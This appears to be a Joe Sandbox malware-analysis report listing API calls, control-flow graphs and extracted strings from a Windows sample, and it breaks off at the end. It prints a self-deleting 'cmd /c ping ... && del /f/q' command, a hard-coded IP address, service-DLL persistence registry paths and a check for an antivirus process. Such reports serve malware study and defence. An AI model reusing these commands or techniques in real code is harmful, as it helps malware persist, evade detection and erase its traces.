                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryProcess32$CloseCreateFirstFreeHandleLoadNextSnapshotToolhelp32lstrcmpi
                                                                                                                • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 653906424-4285911020
                                                                                                                • Opcode ID: 1fd417c11413756bd4715d1432974552d424e7ffcafe747e360662e6f791f9bc
                                                                                                                • Instruction ID: e698cd54efef0762fd02a762dd22e0b3df5000b7872fc78e3db917c3bca36737
                                                                                                                • Opcode Fuzzy Hash: 1fd417c11413756bd4715d1432974552d424e7ffcafe747e360662e6f791f9bc
                                                                                                                • Instruction Fuzzy Hash: 39210E75D41218EFDB10EFA0D949BEEBBB8FB48301F10846AE505B2290D7749B80CF54

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll,?), ref: 00401B80
                                                                                                                • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 00401B98
                                                                                                                • __p__pgmptr.MSVCRT ref: 00401BBA
                                                                                                                • sprintf.MSVCRT ref: 00401BCF
                                                                                                                • GetCurrentProcess.KERNEL32(00000100), ref: 00401BDD
                                                                                                                • SetPriorityClass.KERNELBASE(00000000), ref: 00401BE4
                                                                                                                • GetCurrentThread.KERNEL32 ref: 00401BEC
                                                                                                                • SetThreadPriority.KERNELBASE(00000000), ref: 00401BF3
                                                                                                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00401C10
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentPriorityThread$AddressClassExecuteLibraryLoadProcProcessShell__p__pgmptrsprintf
                                                                                                                • String ID: /c ping 127.0.0.1 -n 1 && del /f/q "%s"$ShellExecuteA$cmd.exe$open$shell32.dll
                                                                                                                • API String ID: 239697722-3584563708
                                                                                                                • Opcode ID: 7249951d3074dcb4a7fe4bb46aef8e51ce1700dc43be1304f4320e222d999fe6
                                                                                                                • Instruction ID: 03b7caf6ff0ed763f8f9b181b84943af9cfe637eb8e7dbc85a8f0fb9157acd93
                                                                                                                • Opcode Fuzzy Hash: 7249951d3074dcb4a7fe4bb46aef8e51ce1700dc43be1304f4320e222d999fe6
                                                                                                                • Instruction Fuzzy Hash: 5A11A171E44208ABEB109FA4DD0ABD9BB7CAB08702F0000B5F645F61D1CBF45A848F69

                                                                                                                 Control-flow Graph (basic blocks with the API calls they make; edges listed as source->destination)
                                                                                                                 • 0 401134-4011b9: #2621 Sleep GetCommandLineA strstr Sleep
                                                                                                                 • 1 401305-4013cb: Sleep LoadLibraryA GetProcAddress Sleep LoadLibraryA GetProcAddress Sleep GetProcAddress wsprintfA CreateMutexA
                                                                                                                 • 2 4011bf-40120c: wsprintfA call 401c18
                                                                                                                 • 3 4013e2-401464: CloseHandle Sleep GetProcAddress Sleep ExpandEnvironmentStringsA Sleep GetFileAttributesA
                                                                                                                 • 4 4013cd-4013d8: GetLastError
                                                                                                                 • 6 4013da-4013dd
                                                                                                                 • 8 4016da-4016ea
                                                                                                                 • 9 401212-4012d9: lstrcpyA call 401c18 wsprintfA call 401c18
                                                                                                                 • 10 4012df
                                                                                                                 • 13 4012f3-401300: call 401b6b
                                                                                                                 • 18 4014e2-401526: GetTickCount wsprintfA Sleep call 401aee
                                                                                                                 • 19 401466-40146d
                                                                                                                 • 23 401491-4014de: #537 call 4016eb #800 GetFileAttributesA
                                                                                                                 • 24 40146f-401476
                                                                                                                 • 26 4012db
                                                                                                                 • 27 4012dd-4012ee: call 401aee
                                                                                                                 • 28 401478-40148f: ExpandEnvironmentStringsA
                                                                                                                 • 30 401528-401535: call 401b6b
                                                                                                                 • 31 40153a-4015b4: Sleep call 401794
                                                                                                                 • 37 4014e0
                                                                                                                 • 40 4015c0-4015da: LoadLibraryA
                                                                                                                 • 41 4015b6
                                                                                                                 • 42 4015e0-401607: Sleep GetProcAddress
                                                                                                                 • 43 4016b3-4016ba
                                                                                                                 • 44 4016d0-4016d8: Sleep
                                                                                                                 • 45 4016bc-4016c3
                                                                                                                 • 46 401609
                                                                                                                 • 47 40160b-401612
                                                                                                                 • 48 4016c5-4016cb: call 401b6b
                                                                                                                 • 49 40162b-40168f: call 40187b wsprintfA
                                                                                                                 • 50 4016a6-4016ad: FreeLibrary
                                                                                                                 • 51 401618-401627
                                                                                                                 • 56 401629
                                                                                                                 • 58 401691-401698: FreeLibrary
                                                                                                                 • 59 40169e-4016a0: Sleep
                                                                                                                 • Edges: 0->1, 0->2, 1->3, 1->4, 2->9, 2->10, 3->18, 3->19, 4->3, 4->6, 6->8, 9->26, 9->27, 10->13, 13->8, 18->30, 18->31, 19->23, 19->24, 23->18, 23->37, 24->23, 24->28, 26->13, 27->13, 28->18, 30->8, 31->40, 31->41, 37->28, 40->42, 40->43, 41->40, 42->46, 42->47, 43->44, 43->45, 44->8, 45->44, 45->48, 46->49, 47->50, 47->51, 48->44, 49->58, 49->59, 50->43, 51->49, 51->56, 56->50, 58->59, 59->50
                                                                                                                APIs
                                                                                                                • #2621.MFC42 ref: 00401162
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 0040116A
                                                                                                                • GetCommandLineA.KERNEL32 ref: 00401170
                                                                                                                • strstr.MSVCRT ref: 00401188
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004011AF
                                                                                                                • wsprintfA.USER32 ref: 004011DE
                                                                                                                  • Part of subcall function 00401C18: memset.MSVCRT ref: 00401C59
                                                                                                                  • Part of subcall function 00401C18: memset.MSVCRT ref: 00401C69
                                                                                                                  • Part of subcall function 00401C18: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 00401C76
                                                                                                                  • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00401C8E
                                                                                                                  • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 00401CA3
                                                                                                                  • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 00401CB8
                                                                                                                  • Part of subcall function 00401C18: FreeLibrary.KERNEL32(00000000), ref: 00401D62
                                                                                                                • lstrcpyA.KERNEL32(SySyeu,?,80000002,?,DisplayName,00000001,System Reta Da miula), ref: 0040121E
                                                                                                                  • Part of subcall function 00401C18: lstrcpyA.KERNEL32(?,?), ref: 00401D1F
                                                                                                                • wsprintfA.USER32 ref: 0040125A
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00401307
                                                                                                                • LoadLibraryA.KERNELBASE(shell32.dll), ref: 00401312
                                                                                                                • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 0040132A
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 00401338
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00401343
                                                                                                                • GetProcAddress.KERNEL32(?,CreateMutexA), ref: 0040135B
                                                                                                                • Sleep.KERNELBASE(00000001), ref: 00401369
                                                                                                                • GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 0040137B
                                                                                                                • wsprintfA.USER32 ref: 004013A4
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 004013B8
                                                                                                                • GetLastError.KERNEL32 ref: 004013CD
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004013F6
                                                                                                                • Sleep.KERNEL32(00000000), ref: 004013FE
                                                                                                                • GetProcAddress.KERNEL32(?,GetVersionExA), ref: 00401410
                                                                                                                • Sleep.KERNEL32(00000000), ref: 0040142F
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%ALLUSERSPROFILE%\Application Data\DRM\,?,00000104), ref: 00401446
                                                                                                                • Sleep.KERNEL32(00000000), ref: 0040144E
                                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 0040145B
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%Temp%\,?,00000104), ref: 00401489
                                                                                                                • #537.MFC42(?), ref: 0040149E
                                                                                                                  • Part of subcall function 004016EB: _access.MSVCRT ref: 00401714
                                                                                                                • #800.MFC42(?,?), ref: 004014C9
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?), ref: 004014D5
                                                                                                                • GetTickCount.KERNEL32 ref: 004014E2
                                                                                                                • wsprintfA.USER32 ref: 004014FC
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00401507
                                                                                                                • Sleep.KERNEL32(00000000,00000000), ref: 00401546
                                                                                                                • LoadLibraryA.KERNELBASE(00000000,360tray.exe), ref: 004015C7
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004015E2
                                                                                                                • GetProcAddress.KERNEL32(00000000,Install), ref: 004015F4
                                                                                                                • wsprintfA.USER32 ref: 00401662
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00401698
                                                                                                                • Sleep.KERNEL32(00000000), ref: 004016A0
                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 004016AD
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004016D2
                                                                                                                 Memory Dump Source
                                                                                                                 • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep$AddressProc$Library$wsprintf$Load$Free$AttributesEnvironmentExpandFileStringslstrcpymemset$#2621#537#800CloseCommandCountCreateErrorHandleLastLineMutexTick_accessstrstr
                                                                                                                • String ID: "%s",MainThread$%ALLUSERSPROFILE%\Application Data\DRM\$%Temp%\$%s%d.dll$%s:%d:%s$119.91.152.151$360tray.exe$CreateMutexA$Description$DisplayName$GUpdate$GetVersionExA$Install$ReleaseMutex$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll$ShellExecuteA$SySyeu$System Reta Da miula$kernel32.dll$open$rundll32.exe$shell32.dll
                                                                                                                • API String ID: 2440389195-1842670322
                                                                                                                • Opcode ID: 33c2655f0df4c5bdb74095cc6ef8f893952d5ebb8828a241915ac991c88762e1
                                                                                                                • Instruction ID: 3e4d9021d073eed2ebaccca2140894c21fcc0a3ec56120faac2ae3b4723efbfb
                                                                                                                • Opcode Fuzzy Hash: 33c2655f0df4c5bdb74095cc6ef8f893952d5ebb8828a241915ac991c88762e1
                                                                                                                • Instruction Fuzzy Hash: 68E17E70945258DFEB20DB64CD49BDEBB79AB44306F0041EAE109B62E1CB795F84CF29

                                                                                                                 Control-flow Graph (basic blocks with the API calls they make; edges listed as source->destination)
                                                                                                                 • 122 4028d2-402947: __set_app_type __p__fmode __p__commode call 402a57
                                                                                                                 • 125 402955-4029ac: call 402a42 _initterm __getmainargs _initterm
                                                                                                                 • 126 402949-402954: __setusermatherr
                                                                                                                 • 129 4029e8-4029eb
                                                                                                                 • 130 4029ae-4029b6
                                                                                                                 • 131 4029b8-4029ba
                                                                                                                 • 132 4029bc-4029bf
                                                                                                                 • 133 4029c5-4029c9
                                                                                                                 • 134 4029ed-4029f1
                                                                                                                 • 135 4029c1-4029c2
                                                                                                                 • 136 4029cb-4029cd
                                                                                                                 • 137 4029cf-4029e0: GetStartupInfoA
                                                                                                                 • 138 4029e2-4029e6
                                                                                                                 • 139 4029f3-4029f5
                                                                                                                 • 140 4029f6-402a23: GetModuleHandleA call 402a60 exit _XcptFilter
                                                                                                                 • Edges: 122->125, 122->126, 125->129, 125->130, 126->125, 129->133, 129->134, 130->131, 130->132, 131->130, 131->132, 132->133, 132->135, 133->136, 133->137, 134->129, 135->133, 136->135, 136->137, 137->138, 137->139, 138->140, 139->140
                                                                                                                 Memory Dump Source
                                                                                                                 • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 801014965-0
                                                                                                                • Opcode ID: c6672fdfefc484d33459fe495202c256ca6675a5ab502eee85e92a4fdfc38f08
                                                                                                                • Instruction ID: 41b20fb36615245da369ed675267998572c4bc05a5f1d3210e4b8a6eebd3b03a
                                                                                                                • Opcode Fuzzy Hash: c6672fdfefc484d33459fe495202c256ca6675a5ab502eee85e92a4fdfc38f08
                                                                                                                • Instruction Fuzzy Hash: 1C415DB1A40308AFDB209FA4DA49A5ABFA8AB09711F20017FF451B73E1D7B84941CB59

                                                                                                                 Control-flow Graph (basic blocks with the API calls they make; edges listed as source->destination)
                                                                                                                 • 143 401000-40102a: CreateFileA
                                                                                                                 • 144 401030-40104c: WriteFile
                                                                                                                 • 145 40102c
                                                                                                                 • 146 401052-401062: CloseHandle
                                                                                                                 • 147 40104e
                                                                                                                 • Edges: 143->144, 143->145, 144->146, 144->147, 145->144, 147->146
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0040101D
                                                                                                                • WriteFile.KERNELBASE(000000FF,004032A0,00006600,?,00000000), ref: 00401044
                                                                                                                • CloseHandle.KERNELBASE(000000FF), ref: 00401056
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1065093856-0
                                                                                                                • Opcode ID: 503e30a7f5baba76d2006de02f8aabc9fecde34cd01d4e51a3acff696a7f97a2
                                                                                                                • Instruction ID: 0b57e97574c49083c60be4e0953d33bf3402ecf870afa031020ca03fe4ac14e9
                                                                                                                • Opcode Fuzzy Hash: 503e30a7f5baba76d2006de02f8aabc9fecde34cd01d4e51a3acff696a7f97a2
                                                                                                                • Instruction Fuzzy Hash: 36F06234E41348FBEB10DFA49D0AF9E7F785B04705F2081A4F6507B2C1C6B96B008B58

                                                                                                                 Control-flow Graph (basic blocks with the API calls they make; edges listed as source->destination)
                                                                                                                 • 148 401aee-401b29: call 4010dd call 401a63
                                                                                                                 • 153 401b2b-401b2d
                                                                                                                 • 154 401b2f-401b4e: memcpy call 401000
                                                                                                                 • 156 401b65-401b68
                                                                                                                 • 157 401b53-401b5d
                                                                                                                 • 158 401b63
                                                                                                                 • 159 401b5f-401b61
                                                                                                                 • Edges: 148->153, 148->154, 153->156, 154->157, 157->158, 157->159, 158->156, 159->156
                                                                                                                APIs
                                                                                                                • memcpy.MSVCRT(-004032A0,119.91.152.151,00000228,?,?,?,?,?,?,0040151F), ref: 00401B42
                                                                                                                 Memory Dump Source
                                                                                                                 • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: 119.91.152.151
                                                                                                                • API String ID: 3510742995-912133076
                                                                                                                • Opcode ID: 1d9d4e6a103436fa6d4a87c3801ee709b09ed6f15207dc39c5cfe36b8e263f2a
                                                                                                                • Instruction ID: 35b040e23320f7c57e1bee8842fc800d469dc723e7eedb9ee6c7bb718427654e
                                                                                                                • Opcode Fuzzy Hash: 1d9d4e6a103436fa6d4a87c3801ee709b09ed6f15207dc39c5cfe36b8e263f2a
                                                                                                                • Instruction Fuzzy Hash: CDF09671E80304B7EB10AE609D47B6A36685B21745F2040BBF904772D2F67E7725529D

                                                                                                                 Control-flow Graph (basic blocks with the API calls they make)
                                                                                                                 • 160 402a60-402a75: #1576
                                                                                                                APIs
                                                                                                                • #1576.MFC42(00402A06,00402A06,00402A06,00402A06,00402A06,00000000,?,0000000A), ref: 00402A70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1576
                                                                                                                • String ID:
                                                                                                                • API String ID: 1976119259-0
                                                                                                                APIs
                                                                                                                • IsIconic.USER32(E8844D8D), ref: 0040240E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Iconic
                                                                                                                • String ID:
                                                                                                                • API String ID: 110040809-0

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 161 40187b-401970 LoadLibraryA GetProcAddress * 4 GetTickCount wsprintfA 166 401972-401979 FreeLibrary 161->166 167 40197f-401982 161->167 166->167
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040188F
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 004018A7
                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 004018BF
                                                                                                                • GetProcAddress.KERNEL32(?,MoveFileA), ref: 004018D7
                                                                                                                • GetProcAddress.KERNEL32(?,MoveFileExA), ref: 004018EF
                                                                                                                • GetTickCount.KERNEL32 ref: 00401921
                                                                                                                • wsprintfA.USER32 ref: 0040193B
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00401979
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$CountFreeLoadTickwsprintf
                                                                                                                • String ID: %s\%d.bak$GetModuleFileNameA$GetSystemDirectoryA$MoveFileA$MoveFileExA$kernel32.dll
                                                                                                                • API String ID: 2704705959-706646508

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 168 401c18-401ce6 memset * 2 LoadLibraryA GetProcAddress * 3 170 401ce8 168->170 171 401cea-401d12 168->171 172 401d2c-401d59 call 401d3a 170->172 171->172 175 401d14-401d25 lstrcpyA 171->175 178 401d68-401d7b 172->178 179 401d5b-401d62 FreeLibrary 172->179 175->172 179->178
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401C59
                                                                                                                • memset.MSVCRT ref: 00401C69
                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 00401C76
                                                                                                                • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00401C8E
                                                                                                                • GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 00401CA3
                                                                                                                • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 00401CB8
                                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 00401D1F
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00401D62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Librarymemset$FreeLoadlstrcpy
                                                                                                                • String ID: ADVAPI32.dll$RegCloseKey$RegOpenKeyExA$RegQueryValueExA
                                                                                                                • API String ID: 3313493744-123098875

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • #355.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402133
                                                                                                                • #2515.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402145
                                                                                                                • #540.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 0040217A
                                                                                                                • #2818.MFC42(?,00409D58,?,00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402190
                                                                                                                • #3499.MFC42(?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 004021C5
                                                                                                                • #6907.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 004021FB
                                                                                                                • #800.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 0040220A
                                                                                                                • #800.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402216
                                                                                                                  • Part of subcall function 004022C0: #800.MFC42(?,00000000,00402B79,000000FF,?,0040222D,?,00000001,00000000,?,?,00000000), ref: 004022EC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#2515#2818#3499#355#540#6907
                                                                                                                • String ID: All Files (*.*)|*.*||
                                                                                                                • API String ID: 1584807323-1256402831

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 195 4016eb-401720 call 401e60 _access 198 401722-40172c call 401e20 195->198 199 40172e 195->199 198->199 203 401730-401781 #5683 #4129 call 4016eb #800 call 401e60 _mkdir 198->203 201 401784-401791 199->201 203->201
                                                                                                                APIs
                                                                                                                • _access.MSVCRT ref: 00401714
                                                                                                                • #5683.MFC42(0000005C,?,?,?,?,?,?), ref: 00401735
                                                                                                                • #4129.MFC42(?,00000000,0000005C,?,?,?,?,?,?), ref: 00401742
                                                                                                                • #800.MFC42(?,00000000,0000005C,?,?,?,?,?), ref: 0040176D
                                                                                                                • _mkdir.MSVCRT ref: 0040177B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4129#5683#800_access_mkdir
                                                                                                                • String ID:
                                                                                                                • API String ID: 2252135049-0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402400: IsIconic.USER32(E8844D8D), ref: 0040240E
                                                                                                                • #470.MFC42(?), ref: 00402004
                                                                                                                  • Part of subcall function 004023D0: SendMessageA.USER32(?,00000000,00000000,00000027), ref: 004023EA
                                                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0040202A
                                                                                                                • GetSystemMetrics.USER32(0000000C), ref: 00402035
                                                                                                                  • Part of subcall function 00402420: GetClientRect.USER32(?,U @), ref: 00402432
                                                                                                                  • Part of subcall function 004023A0: DrawIcon.USER32(00000000,?,?,?), ref: 004023BA
                                                                                                                • #755.MFC42(?,?,?,?), ref: 004020A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$#470#755ClientDrawIconIconicMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2506822835-0

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:28.9%
                                                                                                                Dynamic/Decrypted Code Coverage:10.4%
                                                                                                                Signature Coverage:23.6%
                                                                                                                Total number of Nodes:297
                                                                                                                Total number of Limit Nodes:10
                                                                                                                Execution Graph

                                                                                                                Callgraph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                • Opacity -> Relevance
                                                                                                                • Disassembly available

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.1891225274.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.1891201701.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891266470.00000000003C4000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                • Associated: 00000001.00000002.1891288538.00000000003C6000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_3c0000_XekSuT.jbxd
                                                                                                                Similarity
